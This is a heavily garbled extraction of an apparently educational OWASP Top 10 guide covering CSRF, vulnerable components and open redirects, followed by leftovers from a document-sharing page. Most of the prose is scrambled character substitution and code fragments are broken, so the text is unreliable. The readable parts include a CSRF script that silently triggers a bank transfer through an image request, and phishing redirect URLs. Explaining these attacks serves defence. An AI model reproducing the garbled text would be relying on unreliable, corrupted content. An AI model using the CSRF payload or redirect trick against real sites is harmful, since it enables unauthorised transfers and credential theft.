https://www.mybank.com/transfer.xhtml?toAccount=FR1234567890&amount=1000&currency=EUR
,I@ ?<T, & ADI? N@Q@M<G OM<INA@MN @S@>PO@? OJ >JPIO DI < AJM@DBI >JPIOMT.
AI <OO<>F@M H<?@ HT =MJRN@M NDG@IOGT @S@>PO@ OC@N@ OM<INA@MN. & R<N <POC@IOD><O@? JI HT =<IF^N R@=NDO@ RCDG@
=MJRNDIB JI JOC@M NDO@N. 0@Q@M<G K<B@N JI OC@ QDNDO@? NDO@N C<? OC@ N<H@ H<GD>DJPN >J?@:
<script>
x=new Image();
x.src='https://www.mybank.com/transfer.xhtml?toAccount=XY0000000000&amount=100&currency=EUR'
</script>
"<>C ODH@ OCDN >J?@ R<N DIO@MKM@O@? =T HT =MJRN@M, <N GJIB <N & R<N <POC@IOD><O@? JI HT =<IF^N R@=NDO@, & R<N
BDQDIB 100 @PMJN OJ NJH@JI@ & ?JIÔ @Q@I FIJR!
*DODB<ODJIN
0/# KM@Q@IODJI OJF@I
1C@ HJNO @AA@>ODQ@ HDODB<ODJI <B<DINO 0/# <OO<>FN DN OJ <OO<>C < OJF@I OJ @<>C N@INDODQ@ M@LP@NO. 1C@ KMDI>DKG@ DN
Q@MT NDHKG@.
V 4C@I OC@ N@MQ@M B@I@M<O@N < AJMH, < OJF@I DN B@I@M<O@?, NOJM@? JI N@MQ@M ND?@ <I? <NNJ>D<O@? OJ OC<O
B@I@M<O@? AJMH JI >GD@IO ND?@.
V 4C@I M@>@DQDIB < M@LP@NO AJM < KMJO@>O@? <>ODJI,
_ &A OC@ OJF@I DN KM@N@IO <I? @SDNON JI N@MQ@M ND?@, OC@ <>ODJI DN @S@>PO@?.
_ ,OC@MRDN@, OC@ M@LP@NO DN M@E@>O@? <I? OC@ PN@M NCJPG? =@ M@?DM@>O@? OJ < G<I?DIB K<B@. 4C@I
<KKGD><=G@, OC@ PN@M^N N@NNDJI NCJPG? =@ DIQ<GD?<O@?. ,A >JPMN@, JIO@IO/PKGJ<?N/2014/01/M<I?JH;IPH=@M.KIB)
OWASP Top 10 A8 Cross-Site Request Forgery (CSRF)
,=QDJPNGT, OC@ Q<GP@ JA OC@ B@I@M<O@? OJF@I DN IJO >JIAD?@IOD<G NJ DO HPNO =@ PIKM@?D>O<=G@. &O NCJPG? =@ <
B<N@64-@I>J?@? M<I?JH Q<GP@ (<O G@<NO 32 =TO@N GJIB) JM < 22&!. AQJD? >JPIO@MN, ODH@NO<HKN, NDHKG@ NPDO@N JM
NOMDIBN B@I@M<O@? PNDIB PN@M DIAJMH<ODJI.
1C@ NDHKGD@NO H@OCJ? >JINDON DI B@I@M<ODIB < NDIBG@ OJF@I AJM @<>C <POC@IOD><O@? PN@M (K@M-N@NNDJI KMJO@>ODJI).
&O DN PNP<GGT NOJM@? DI PN@M^N %11- N@NNDJI. 1C@ N<H@ OJF@I DN DIE@>O@? DI <GG AJMHN OC<O HPNO =@ KMJO@>O@? PIODG
PN@M^N N@NNDJI DN DIQ<GD?<O@?. 6JP >C N@INDODQ@ K<B@ (K@M-2/& KMJO@>ODJI)
JM @Q@I < OJF@I AJM @<>C N@INDODQ@ M@LP@NO (K@M-M@LP@NO KMJO@>ODJI).
'0# (Q@MNDJI 2.1 <I? <=JQ@) <I? AM<H@RJMFN GDF@ 0/#$P<M? (COOKN://RRR.JR<NK.JMB/DI?@S.KCK/
<O@BJMT:,4A0-;0/#$P<M?;-MJE@>O) KMJQD?@ <POJH<OD> KMJO@>ODJI <B<DINO 0/# <OO<>FN.
6JP >ODJI ?@K@I?DIB JI TJPM I@@?N.
V &?@IODAT OC@ <>ODJIN (AJMHN) OJ KMJO@>O. 6JP >O <GG K<B@N =PO TJP NCJPG? AJ>PN JI M@LP@NO OC<O RDGG
HJ?DAT OC@ NO<O@ JA OC@ <KKGD><ODJI.
V $@I@M<O@ TJPM M<I?JH Q<GP@ (0@>PM@/<I?JH DN M@>JHH@I?@?) <I? N<Q@ DO DI OC@ I@R N@NNDJI.
_ #JM < K@M-M@LP@NO KMJO@>ODJI, < '<Q<"" Filter >F OC@ M@NKJIN@ OC<O RDGG ?DNKG<T < KMJO@>O@? AJMH
_ #JM < K@M-N@NNDJI KMJO@>ODJI, NDHKGT DHKG@H@IO H@OCJ? sessionCreated AMJH
HttpSessionListener DIO@MA<>@ OJ >M@<O@ TJPM OJF@I JI>@.
_ #JM < K@M-2/& KMJO@>ODJI, TJP >M@<O@ <GG OJF@IN JI>@ PNDIB M@<O@ @<>C OJF@I JI-?@H<I?, OC@ ADMNO ODH@ OC@ K<B@ OJ KMJO@>O DN ><GG@? PNDIB
< Filter
V &I OC@ AJMH OJ KMJO@>O, <?? < CD??@I K<M<H@O@M RDOC OC@ OJF@I M@OMD@Q@? AMJH OC@ >PMM@IO N@NNDJI <N Q<GP@.
V &HKG@H@IO <I? ?@>G<M@ < '<Q<"" Filter =@AJM@ N@MQG@ON OJ KMJO@>O OJ Q@MDAT < OJF@I DN KMJQD?@? DI
OC@ M@LP@NO <I? H<O>C@N OC@ OJF@I N<Q@? DI PN@M^N N@NNDJI. &A F DN NPNK@>O@?, GJB <Q<DG<=G@
DIAJMH<ODJI OC@I N@I? F@? N@NNDJIY
+JO@ OC<O, AJM K@M-N@NNDJI <I? K@M-2/& KMJO@>ODJIN, TJP >F DN NPNK@>O@? (RDOC K@M-M@LP@NO KMJO@>ODJI, OJF@I M@I@R<G DN NTNO@H<OD>).
AI? OC@ N<H@ Filter >PN JI OC@ ORJ HJNO PN@?: A-1%A <I? M@-
<POC@IOD><ODJI.
A-1%A (COOK://@I.RDFDK@?D<.JMB/RDFD/A-1%A) DN PN@? OJ <QJD? <POJH<OD> M@LP@NO N@IO =T MJ=JON OJ =@
@S@>PO@?. &O DN >@KO<=G@ NJGPODJI AJM <IJITHJPN <>ODJIN.
".B. TJP >ODJI JI TJPM R@=NDO@ OJ KM@Q@IO <>>JPIO >M@<ODJI M@LP@NO@? =T MJ=JON.
/@-<POC@IOD><ODJI NDHKGT >JINDNON DI <NFDIB OC@ <POC@IOD><O@? PN@M OJ @IO@M DON >M@?@IOD<GN <B<DI =@AJM@ K@MAJMHDIB
OC@ M@LP@NO@? <>ODJI. +JR<?<TN, <GG =<IFN (@S>@KO HT=<IF.>JH) PN@ OCDN H@>C<IDNH =@AJM@ < OM<INA@M. ,A
>JPMN@, RDOC OCDN NJGPODJI, OC@ PN@M >JPG? PN@ < GDIF DI DON A<QJMDO@N <I? RJPG? C<Q@ OJ <POC@IOD><O@ =@AJM@ OC@
OM<INA@M >JHH@I?@?).
+JO@: AN & @SKG<DI@? DI OC@ DIOMJ?P>ODJI (COOK://=GJB.DKKJI.AM/2013/10/10/JR<NK-OJK-10-DIOMJ?P>ODJI/), DI OC@ K<NO,
0/# R<N JI@ JA OC@ CDBC@NO MDNFN D?@IODAD@? =T ,4A0- O@<H (M<IF 5). 1C@I, <KKGD><ODJI <I? AM<H@RJMF
?@Q@GJK@MN DHKMJQ@? OC@ N@>PMDOT JI OC@DM KMJ?P>ON. +JR, 0/# <OO<>FN <M@ M<M@, NJ OC@ MDNF R<N M@>@IOGT HJQ@?
OJ OC@ @I? JA OC@ GDNO (M<IF 8). BPO NO<T <G@MO <I? <KKGT OC@ M@>JHH@I?@? HDODB<ODJIY 0/# DN NODGG DI ,4A0-^N
GDNO JA MDNFN!
!@N>MDKODJI
(IJRI NJAOR<M@ QPGI@M<=DGDOD@N <M@ <Q<DG<=G@ OJ @Q@MTJI@ JI OC@ &IO@MI@O. &A F@M FIJRN RCD>C >JHKJI@ION
TJP PN@, C@ >F@M AJPI? JPO HT =<IF^N R@=NDO@ PN@N AK<>C@ R@= N@MQ@M Q@MNDJI 1.3.22 JI 4DI32. 1CDN
Q@MNDJI C<N < >MDOD><G QPGI@M<=DGDOT (COOK://>Q@.HDOM@.JMB/>BD-=DI/>Q@I<H@.>BD?I<H@=3"-2002-0061) OC<O <GGJRN
M@HJO@ <OO<>F@MN OJ @S@>PO@ <M=DOM<MT >JHH<I?N. AN, JI 4DI?JRN, OC@ R@= N@MQ@M MPIN RDOC 0601"* KMDQDG@B@N,
OCDN QPGI@M<=DGDOT >F@M OJ ?J RC<O C@ R<ION (NO@<G DIAJMH<ODJI, NOJK N@MQD>@NY) JI OC<O
N@MQ@M.
1C@ <OO<>F@M ADMNO NOJK OC@ GJ><G ADM@R<GG OC<O =GJ>FN JPO=JPI? >JII@>ODJIN AMJH OC@ R@= N@MQ@M OJ OC@ &IO@MI@O. 1C@I
C@ > HJIDOJMDIB OJJG, DINO<GG DO <I? NO<MO DO OJ DIO@M>@KO <GG OM<AAD> =@CDI? OC@ AK<>C@
R@= N@MQ@M (<AO@M 00) O@MHDI<ODJI). AGG GJBDI M@LP@NON <M@ DIO@M>@KO@? <I? M@G@Q<IO DIAJMH<ODJI (J=QDJPNGT, GJBDI
<I? K<NN>J?@) DN @SOM<>O@? <I? PKGJ<?@? OJ DON N@MQ@M PNDIB < NDHKG@ B<O>C N>MDKO.
*DODB<ODJIN
1C@ ADMNO KMJO@>ODJI DN JA >JPMN@ OJ J=APN><O@ DIAJMH<ODJI M@G<O@? OJ OC@ >JHKJI@ION (N@MQ@MN, AM<H@RJMFN,
JK@M<ODIB NTNO@HNY) TJP PN@ OJ MPI TJPM <KKGD><ODJI. /@A@M OJ OC@ KM@QDJPN <MOD>G@ M@G<O@? OJ 0@>PMDOT
*DN>JIADBPM<ODJI (COOK://=GJB.DKKJI.AM/2013/11/14/JR<NK-OJK-10-<5/) AJM ?@O<DGN.
(IJR TJPM <KKGD><ODJI
1J M@?P>@ OC@ MDNF JA PNDIB QPGI@M<=G@ >JHKJI@ION, TJP I@@? OJ FIJR @S<>OGT RC<O >JHKJI@ION TJPM <KKGD><ODJI
PN@N (?DM@>OGT JM IJO) <I? OC@ Q@MNDJI JA @<>C JA OC@N@ >JHKJI@ION.
&A TJP PN@ *<Q@I OJ =PDG? TJPM <KKGD><ODJI, TJP NCJPG? <?? 3@MNDJIN *<Q@I KGPBDI (COOK://HJEJ.>J?@C<PN.JMB/
Q@MNDJIN-H<Q@I-KGPBDI/) OJ ?DNKG<T OC@ GDNO JA ?@K@I?@I>D@N PN@? =T TJPM <KKGD><ODJI RCD>C C<Q@ I@R@M Q@MNDJIN
<Q<DG<=G@. 6JP >O ?J>PH@IO<ODJI.
1CDN *<Q@I KGPBDI DN EPNO < ADMNO NO@K OJ Q@MDAT TJPM <KKGD><ODJI PN@N I@R@NO Q@MNDJIN JA DON ?@K@I?@IO GD=M<DMD@N.
BPO J=QDJPNGT, TJP ><IÔ PK?<O@ <GG OC@ ?@K@I?@I>D@N JIGT =@><PN@ OC@M@ DN < I@R Q@MNDJI <Q<DG<=G@. 2K?<ODIB
< ?@K@I?@I>T^N Q@MNDJI DHKGD@N MPIIDIB IJI M@BM@NNDJI O@NON. AI? PK?<ODIB GD=M<MD@N NJH@ODH@N >C<IB@?. B@ND?@N, G<O@NO Q@MNDJIN >JPG? C<Q@ IJ N@>PMDOT ADS@N <I? DO >JPG? >JIO<DI I@R
QPGI@M<=DGDOD@N.
(IJR TJPM QPGI@M<=DGDOD@N
AN & @SKG<DI@? DI < KM@QDJPN KJNO (COOK://=GJB.DKKJI.AM/2013/11/14/JR<NK-OJK-10-<5/), N@>PMDOT K<O>C@N NCJPG? =@
DINO<GG@? <N NJJI <N KJNND=G@. BPO TJP <GNJ I@@? OJ FIJR OC@N@ K<O>C@N @SDNO <I? RC<O OC@T ADS OJ FIJR RC@OC@M
TJPM <KKGD><ODJI DN <O MDNF JM IJO.
,4A0- KMJKJN@N < Q@MT DIO@M@NODIB AM@@/JK@I-NJPM>@ OJJG I<H@? !@K@I?@I>T C@>F (COOKN://BDOCP=.>JH/
E@M@HTGJIB/!@K@I?@I>TC@>F) <I? AJ>PN@? JI FIJRI QPGI@M<=DGDOD@N. &O DN <Q<DG<=G@ <N < NDHKG@ E<Q< >JHH<I?
GDI@, =PO <GNJ <N KGPBDIN AJM AIO, *<Q@I JM '@IFDIN.
OWASP Top 10 A9 Using Components with Known
Vulnerabilities
1CDN OJJG NC<GG N><ODJI OJ D?@IODAT OCDM?-K<MOT GD=M<MD@N (RDOC Q@MNDJIN). 1C@I AJM @<>C GD=M<MT, OC@ OJJG
RDGG >C@>F DA OC@ D?@IODAD@? Q@MNDJI C<N JHHJI 3PGI@M<=DGDOD@N <I? "SKJNPM@N (3") M@A@M@I>@? DI OC@ +<ODJI<G
3PGI@M<=DGDOT !<O<=<N@ (COOKN://IQ?.IDNO.BJQ/). 4DOC OCDN OJJG, TJP RDGG C<Q@ < >G@<M QD@R JA OC@ FIJRI QPGI@M<=DGDOD@N
DI TJPM <KKGD><ODJI
/PI TJPM JRI N@>PMDOT <NN@NNH@IO O@NON
"Q@I DA OC@M@ <M@ IJ FIJRI 3" D?@IODAD@?, OC@ >JH=DI<ODJI JA ?DAA@M@IO GD=M<MD@N <I? CJR TJP PN@ OC@N@ A-&N
>JPG? >M@<O@ < QPGI@M<=DGDOT. B@AJM@ ?@KGJTDIB < I@R H<EJM Q@MNDJI JA TJPM <KKGD><ODJI JI KMJ?P>ODJI, >JIND?@M
?JDIB < APGG NO<OD> >J?@ <I<GTNDN <I? < H<IP<G >J?@ M@QD@R. /PIIDIB < K@I@OM<ODJI O@NO DN <GNJ M@>JHH@I?@? AJM
Q@MT N@INDODQ@ <KKGD><ODJIN.
"?P><O@ TJPM ?@Q@GJK@MN
!@Q@GJK@M NCJPG? IJO <?? < I@R ?@K@I?@I>T DI OC@ <KKGD><ODJI RDOCJPO < NOMD>O Q<GD?<ODJI KMJ>@NN.
#DMNO, =@AJM@ <??DIB < I@R GD=M<MT, >C@>F OC<O IJ @SDNODIB ?@K@I?@I>T >O, < ?@Q@GJK@M OC<O R<IO@? OJ H<IDKPG<O@ < 0OMDIB ?@>D?@? OJ <?? $JJBG@ $P<Q< <N <
?@K@I?@I>T. & C<Q@ IJOCDIB <B<DINO $P<Q<, =PO AK<>C@ JHHJIN )<IB R<N <GM@<?T < ?@K@I?@I>T <I? >JPG?
?J @S<>OGT OC@ N<H@ OCDIB. 4CT <??DIB < I@R GD=M<MT (<I? DON JRI ?@K@I?@I>D@N) JIGT AJM JI@ H@OCJ?? 6JPM
<KKGD><ODJI RDGG =@ =DBB@M, HJM@ ?DAAD>PGO OJ H<DIO<DI <I? HJM@ DHKJMO<IO, TJP >JPG? <?? I@R QPGI@M<=DGDOD@N!
&A TJP M@<GGT I@@? OC<O GD=M<MT, >C@>F DO C<N IJ FIJRI QPGI@M<=DGDOD@N JI OC@ +3!. &A QPGI@M<=DGDOD@N @SDNO, Q@MDAT OC@T
<M@ ADS@? DI OC@ O<MB@O@? Q@MNDJI.
&A TJP PN@ *<Q@I RDOC < M@KJNDOJMT H<I<B@M, TJP NCJPG? <GNJ <KKGT OCDN Q<GD?<ODJI KMJ>@NN JI OCDN M@KJNDOJMT OJ
M@E@>O < GD=M<MT RCD>C C<N FIJRI QPGI@M<=DGDOD@N.
"I<=G@ OC@ '<Q< 0@>PMDOT *<I<B@M
*T G<NO M@>JHH@I?<ODJI <=JPO OCDN OJKD> RJPG? =@ OJ @I<=G@ <I? KMJK@MGT >JIADBPM@ OC@ 0@>PMDOT *<I<B@M
<>>JM?DIB OJ TJPM I@@?N. &O RDGG =@ TJPM G<NO GDI@ JA ?@A@IN@ OJ KMJO@>O TJPM NTNO@H <B<DINO NJH@ QPGI@M<=DGDOT
@SKGJDON JI '<Q< GD=M<MD@N.
,A >JPMN@, DO DN JIGT AJM '<Q< <KKGD><ODJIN. &O RJIÔ KMJO@>O TJPM R@= N@MQ@M JM TJPM ?<O<=<N@Y
,4A0- 1JK 10 Z A10 2IQ<GD?<O@? /@?DM@>ON <I? #JMR<M?N
!@N>MDKODJI
&A < PN@M DN M@?DM@>O@? JM AJMR<M?@? OJ < K<B@ ?@ADI@? =T F@M.
1CDN <OO<>F DN PN@? OJ M@?DM@>O < PN@M OJ < H<GD>DJPN R@=NDO@ OCMJPBC < R@=NDO@ RDOC < OMPNO@? ?JH<DI I<H@
(KCDNCDIB) JM OJ <>>@NN >@NN <GG <Q<DG<=G@ N@MQD>@N <I? H<I<B@ HT
JRI A<QJMDO@N. 1C<IFN OJ OCDN K<B@, & >JHKPO@M, @Q@MTRC@M@ DI OC@ RJMG?.
#JM @S<HKG@, RC@I & R<IO OJ >JINPGO HT @H<DGN, & >GD>F JI [*T H<DG=JS\ & C<Q@ <??@? DI OC<O K<B@. 1C@
2/) https://www.mybank.com/redirect.jsp?url=www.mymailbox.com DN ><GG@? OC@I & <H M@?DM@>O@? OJ
http://www.mymailbox.com/ .
)<NO ODH@ &^Q@ >C@>F@? HT H<DG=JS, & C<Q@ M@>@DQ@? JIADMH HT GJBDI <I? K<NN>J?@ AJM
N@>PMDOT M@<NJIN. & >GD>F JI OC@ KMJQD?@? GDIF, @IO@M HT GJBDI <I? K<NN>J?@ <I? OC<O^N DO!
1C@ KMJ=G@H DN OC@ GDIF & C<Q@ >GD>F@? JI R<N https://www.mybank.com/
redirect.jsp?url=www.trustme.com <I? & R<N NDG@IOGT M@?DM@>O@? OJ http://www.trustme.com/ JI < K<B@
RDOC OC@ GJJF-<I?-A@@G JA HT =<IF^N R@=NDO@.
A A@R ?<TN G<O@M, & M@>@DQ@? < ><GG AMJH HT =<IF. 0JH@JI@ C<N PN@? HT K@MNJI<G >M@?@IOD<GN OJ <>>@NN HT
<>>JPION <I? N@IO HT HJI@T <=MJ<?.
*DODB<ODJIN
&O DN Q@MT NDHKG@ OJ HDODB<O@ OCDN MDNF: I@Q@M M@?DM@>O JM AJMR<M? OJ PIQ@MDAD@? 2/)N JM 2/)N HJ?DAD<=G@ RDOC PN@M
@IOMT.
AI PIQ@MDAD@? 2/) DN <N@N, OC@ 2/) >ODJIN) JM < K<OC OJ @ (AJM AJMR<M?N).
&A TJP M@<GGT I@@? OJ M@?DM@>O < PN@M OJ <IJOC@M K<B@ (@SO@MI<G JM DIO@MI<G) M@BDNO@M@? =T OC<O PN@M, OC@ K<B@ 2/)
HPNO IJO =@ DI < M@LP@NO K<M<H@O@M. 2N@ O M@A@M@I>@ DINO@<?. /@A@M OJ JI@ JA HT KM@QDJPN KJNON <=JPO
&IN@>PM@ !DM@>O ,=E@>O /@A@M@I>@N (COOK://=GJB.DKKJI.AM/2013/11/04/JR<NK-OJK-10-<4/) AJM ?@O<DGN JI B@I@M<ODIB O J=E@>O M@A@M@I>@.
".B. PN@ https://www.mybank.com/redirect.jsp?urlId=abc321 DINO@<? JA https://www.mybank.com/
redirect.jsp?url=www.mymailbox.com , RC@M@ urlId DN O M@A@M@I>@ OJ OC@ 2/)
http://www.mymailbox.com <??@? DI PN@M^N A<QJMDO@N.
B@ND?@N, TJP >C@>F OC@ 2/) DN R@GG-AJMH@? <I? >JHH@M>D<G <IODQDMPN/ADM@R<GG KMJ?P>ON <I? JIGDI@ N@MQD>@N KMJQD?@ =G<>FGDNO JA NPNKD>DJPN R@=NDO@N OC<O ><IÔ =@
OMPNO@?.
&A OC@ PN@M >CJJN@ < G<I?DIB K<B@ <AO@M NJH@ <>ODJIN (@.B. DON ?@A<PGO CJH@K<B@ <AO@M GJBDI), DINO@<? JA
BDQDIB CDH < =G<IF AD@G? OJ @IO@M RC<O C@ R<ION, KMJKJN@ < GDNO JA <>>@KO<=G@ G<I?DIB K<B@N. 1CDN R<T, OC@ PN@M
RJIÔ =@ O@HKO@? OJ @IO@M NJH@OCDIB GDF@ /secure/mgmt/users.xhtml OJ <>>@NN PN@M H<I<B@H@IO RDOCJPO
<POCJMDU<ODJI! ,=QDJPNGT, DA TJP C<Q@ <KKGD@? RC<O & C<Q@ N<D? DI HT KJNO <=JPO *DNNDIB #PI>ODJI )@Q@G A>>@NN
JIOMJG (COOK://=GJB.DKKJI.AM/2013/12/09/JR<NK-OJK-10-<7/), OCDN <OO@HKO NCJPG? IJO RJMF
AI? <B<DI, M@H@H=@M TJP HPNO <QJD? ?DM@>O M@A@M@I>@N. !JIÔ BDQ@ OC@ M@<G K<OC OJ OC@ DIO@MI<G M@NJPM>@ DI OC@ GDNO!

Owasp Top 10 by Ippon

Hochgeladen von

Dokumentinformationen

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Owasp Top 10 by Ippon

Hochgeladen von

Copyright:

Verfügbare Formate

,4A0- 1JK 10 Z &IOMJ?

public Lisy<Account> findAll() {

public Lisy<Account> findAll() {

Das könnte Ihnen auch gefallen